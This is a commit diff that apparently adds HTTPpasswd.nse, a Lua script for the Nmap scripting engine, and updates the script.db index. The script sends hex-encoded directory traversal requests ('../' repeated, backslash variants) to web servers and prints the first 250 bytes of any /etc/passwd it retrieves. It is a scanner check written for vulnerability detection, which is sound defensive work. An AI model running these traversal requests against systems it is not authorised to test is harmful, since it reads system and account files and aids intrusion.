Adding my /etc/passwd directory traversal script (HTTPpasswd.nse)

scripts/HTTPpasswd.nse

@@ -0,0 +1,153 @@
+-- HTTP probe for /etc/passwd
+-- 07/20/2007
+
+-- Started with Thomas Buchanan's HTTPAuth.nse as a base
+-- Applied some great suggestions from Brandon Enright, thanks a lot man!
+
+id = "HTTP directory traversal passwd probe"
+
+description = "Probe for /etc/passwd if server is susceptible to directory traversal"
+
+author = "Kris Katterjohn <katterjohn@gmail.com>"
+
+license = "Look at Nmap's COPYING"
+
+categories = {"intrusive"}
+
+require "shortport"
+
+-- Check for a valid HTTP return code, and check
+-- the supposed passwd file for validity
+validate = function(response)
+	local passwd
+	local line
+	local start, stop
+
+	-- Hopefully checking for only 200 won't bite me in the ass, but
+	-- it's the only one that makes sense and I haven't seen it fail
+	if string.match(response, "HTTP/1.[01] 200") then
+		start, stop = string.find(response, "\r\n\r\n")
+		passwd = string.sub(response, stop+1)
+	else
+		return
+	end
+
+	start, stop = string.find(passwd, "[\r\n]")
+	line = string.sub(passwd, 1, stop)
+
+	if string.match(line, "^[^:]+:[^:]*:[0-9]+:[0-9]+:") then
+		return passwd
+	end
+
+	return
+end
+
+-- Connects to host:port, send cmd, and returns the (hopefully valid) response
+talk = function(host, port, cmd)
+	local socket
+	local response
+
+	socket = nmap.new_socket()
+
+	socket:connect(host.ip, port.number)
+
+	socket:send(cmd)
+
+	response = ""
+
+	while true do
+		local status, lines = socket:receive_lines(1)
+
+		if not status then
+			break
+		end
+
+		response = response .. lines
+	end
+
+	socket:close()
+
+	return validate(response)
+end
+
+httpget = function(str)
+	return "GET " .. str .. " HTTP/1.0\r\n\r\n"
+end
+
+hexify = function(str)
+	local ret
+	ret = string.gsub(str, "%.", "%%2E")
+	ret = string.gsub(ret, "/", "%%2F")
+	ret = string.gsub(ret, "\\", "%%5C")
+	return ret
+end
+
+-- Returns truncated passwd file and returned length
+truncatePasswd = function(passwd)
+	local len = 250
+	return string.sub(passwd, 1, len), len
+end
+
+output = function(passwd, dir)
+	local trunc, len = truncatePasswd(passwd)
+	local out = ""
+	out = out .. "Found with \"" .. dir .. "\"\n"
+	out = out .. "Printing first " .. len .. " bytes:\n"
+	out = out .. trunc
+	return out
+end
+
+portrule = shortport.port_or_service({80, 8080}, "http")
+
+action = function(host, port)
+	local cmd, response
+	local dir
+
+	dir = "//etc/passwd"
+	cmd = httpget(hexify(dir))
+
+	response = talk(host, port, cmd)
+
+	if response then
+		return output(response, dir)
+	end
+
+	dir = string.rep("../", 10) .. "etc/passwd"
+	cmd = httpget(hexify(dir))
+
+	response = talk(host, port, cmd)
+
+	if response then
+		return output(response, dir)
+	end
+
+	dir = "." .. string.rep("../", 10) .. "etc/passwd"
+	cmd = httpget(hexify(dir))
+
+	response = talk(host, port, cmd)
+
+	if response then
+		return output(response, dir)
+	end
+
+	dir = string.rep("..\\/", 10) .. "etc\\/passwd"
+	cmd = httpget(hexify(dir))
+
+	response = talk(host, port, cmd)
+
+	if response then
+		return output(response, dir)
+	end
+
+	dir = string.rep("..\\", 10) .. "etc\\passwd"
+	cmd = httpget(hexify(dir))
+
+	response = talk(host, port, cmd)
+
+	if response then
+		return output(response, dir)
+	end
+
+	return
+end
+

scripts/script.db

@@ -1,37 +1,42 @@
-Entry{ category = "intrusive", filename = "dns-test-open-recursion.nse" }
-Entry{ category = "backdoor", filename = "RealVNC_auth_bypass.nse" }
 Entry{ category = "safe", filename = "showOwner.nse" }
-Entry{ category = "intrusive", filename = "SSLv2-support.nse" }
+Entry{ category = "backdoor", filename = "RealVNC_auth_bypass.nse" }
-Entry{ category = "malware", filename = "ircZombieTest.nse" }
+Entry{ category = "vulnerability", filename = "SQLInject.nse" }
-Entry{ category = "version", filename = "skype_v2-version.nse" }
+Entry{ category = "demo", filename = "daytimeTest.nse" }
-Entry{ category = "demo", filename = "echoTest.nse" }
 Entry{ category = "intrusive", filename = "bruteTelnet.nse" }
-Entry{ category = "discovery", filename = "SMTPcommands.nse" }
+Entry{ category = "demo", filename = "SMTP_openrelay_test.nse" }
-Entry{ category = "intrusive", filename = "SMTPcommands.nse" }
+Entry{ category = "intrusive", filename = "HTTPAuth.nse" }
-Entry{ category = "discovery", filename = "ripeQuery.nse" }
-Entry{ category = "demo", filename = "chargenTest.nse" }
-Entry{ category = "backdoor", filename = "strangeSMTPport.nse" }
-Entry{ category = "safe", filename = "iax2Detect.nse" }
-Entry{ category = "discovery", filename = "iax2Detect.nse" }
-Entry{ category = "demo", filename = "showSMTPVersion.nse" }
 Entry{ category = "demo", filename = "showHTMLTitle.nse" }
 Entry{ category = "safe", filename = "showHTMLTitle.nse" }
-Entry{ category = "backdoor", filename = "mswindowsShell.nse" }
+Entry{ category = "demo", filename = "chargenTest.nse" }
-Entry{ category = "intrusive", filename = "anonFTP.nse" }
+Entry{ category = "intrusive", filename = "dns-test-open-recursion.nse" }
-Entry{ category = "malware", filename = "kibuvDetection.nse" }
-Entry{ category = "demo", filename = "SMTP_openrelay_test.nse" }
-Entry{ category = "discovery", filename = "nbstat.nse" }
-Entry{ category = "safe", filename = "nbstat.nse" }
-Entry{ category = "discovery", filename = "SNMPsysdesr.nse" }
-Entry{ category = "safe", filename = "SNMPsysdesr.nse" }
-Entry{ category = "intrusive", filename = "HTTPAuth.nse" }
-Entry{ category = "discovery", filename = "finger.nse" }
-Entry{ category = "", filename = "showHTTPVersion.nse" }
-Entry{ category = "intrusive", filename = "SSHv1-support.nse" }
-Entry{ category = "intrusive", filename = "ftpbounce.nse" }
-Entry{ category = "vulnerability", filename = "xamppDefaultPass.nse" }
-Entry{ category = "demo", filename = "showSSHVersion.nse" }
-Entry{ category = "discovery", filename = "ircServerInfo.nse" }
 Entry{ category = "discovery", filename = "MSSQLm.nse" }
 Entry{ category = "intrusive", filename = "MSSQLm.nse" }
-Entry{ category = "demo", filename = "daytimeTest.nse" }
+Entry{ category = "intrusive", filename = "SSHv1-support.nse" }
+Entry{ category = "demo", filename = "echoTest.nse" }
+Entry{ category = "malware", filename = "kibuvDetection.nse" }
+Entry{ category = "vulnerability", filename = "xamppDefaultPass.nse" }
+Entry{ category = "intrusive", filename = "SSLv2-support.nse" }
+Entry{ category = "intrusive", filename = "zoneTrans.nse" }
+Entry{ category = "discovery", filename = "zoneTrans.nse" }
+Entry{ category = "intrusive", filename = "ftpbounce.nse" }
+Entry{ category = "version", filename = "skype_v2-version.nse" }
+Entry{ category = "demo", filename = "showSMTPVersion.nse" }
+Entry{ category = "discovery", filename = "SNMPsysdesr.nse" }
+Entry{ category = "safe", filename = "SNMPsysdesr.nse" }
+Entry{ category = "discovery", filename = "nbstat.nse" }
+Entry{ category = "safe", filename = "nbstat.nse" }
+Entry{ category = "version", filename = "iax2Detect.nse" }
+Entry{ category = "version", filename = "HTTP_open_proxy.nse" }
+Entry{ category = "demo", filename = "showSSHVersion.nse" }
+Entry{ category = "discovery", filename = "SMTPcommands.nse" }
+Entry{ category = "intrusive", filename = "SMTPcommands.nse" }
+Entry{ category = "intrusive", filename = "anonFTP.nse" }
+Entry{ category = "safe", filename = "robots.nse" }
+Entry{ category = "discovery", filename = "finger.nse" }
+Entry{ category = "backdoor", filename = "strangeSMTPport.nse" }
+Entry{ category = "discovery", filename = "ircServerInfo.nse" }
+Entry{ category = "backdoor", filename = "mswindowsShell.nse" }
+Entry{ category = "malware", filename = "ircZombieTest.nse" }
+Entry{ category = "discovery", filename = "ripeQuery.nse" }
+Entry{ category = "", filename = "showHTTPVersion.nse" }
+Entry{ category = "intrusive", filename = "HTTPpasswd.nse" }